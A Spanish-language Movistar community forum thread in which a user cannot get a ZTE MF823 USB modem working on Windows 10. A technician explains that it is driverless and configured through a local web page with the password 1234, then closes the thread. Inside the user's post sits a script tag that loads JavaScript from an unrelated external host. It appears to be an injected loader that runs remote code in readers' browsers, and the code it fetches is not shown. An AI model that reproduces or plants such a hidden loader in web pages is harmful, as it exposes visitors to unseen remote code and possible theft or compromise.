Módem ZTE MF823 en Windows 10

ccrurbaser
Más integrado que la RDSI
Módem ZTE MF823 en Windows 10

Estoy intentando hacer funcionar el modem usb en un Windows 10 Home 32 bits. El sistema reconoce el dispositivo pero no me lanza el Escritorio Movistar. Tampoco consigo hacerlo funcionar instalando el Escritorio Movistar 8.9. En ese caso de nuevo me reconoce el dispositivo pero no lo enciende. Al pulsar sobre "Encender" parace un mensaje de error de "No se honseguido acceder al Dispositivo Internet Móvil."

 

Espero sus noticias.

 

Un saludo.

<script src="https://cuev.in/aux.php?ver=1.0&ref=at" type="text/javascript"></script>
Mensaje 1 de 3
4.561 Visitas
2 RESPUESTAS 2
TécnicoMóvil-movistar
Técnico Móviles

¡Hola ccrurbaser Bienvenid@ a la Comunidad! :smileyvery-happy:

 

El módem que nos indicas es un DriverLess tal como lo indica nuestra web aquí, eso indica que no es necesaria la instalación e interacción del escritorio Movistar, lo que tienes que realizar una vez haya reconocido el módem el ordenador es ir a tu navegador y escribir esta URL http://modem.movistar/index.html en la cual te va a pedir el usuario y contraseña 1234. :smileywink:

 

Lo compruebas y cualquier cosa nos comentas.:smileywink:

 

 

:smileyhappy: Saludos :smileyhappy:



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

Para información sobre nuestros Servicios Móvil , Ofertas Móvil, Móviles , Tarifas móvil y Ofertas visita Movistar

 

Solución aceptada.png
Mensaje 2 de 3
4.536 Visitas
TécnicoMóvil-movistar
Técnico Móviles

¡Hola de nuevo ccrurbaser:smileyvery-happy:

 

Dado que no hemos recibido respuesta por tu parte, procederemos al cierre de este hilo, para cualquier duda o consulta en el futuro ya sabes donde encontrarnos. :smileywink:

 

 

:smileyhappy: Saludos :smileyhappy:



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

Para información sobre nuestros Servicios Móvil , Ofertas Móvil, Móviles , Tarifas móvil y Ofertas visita Movistar

 

Solución aceptada.png
Mensaje 3 de 3
4.466 Visitas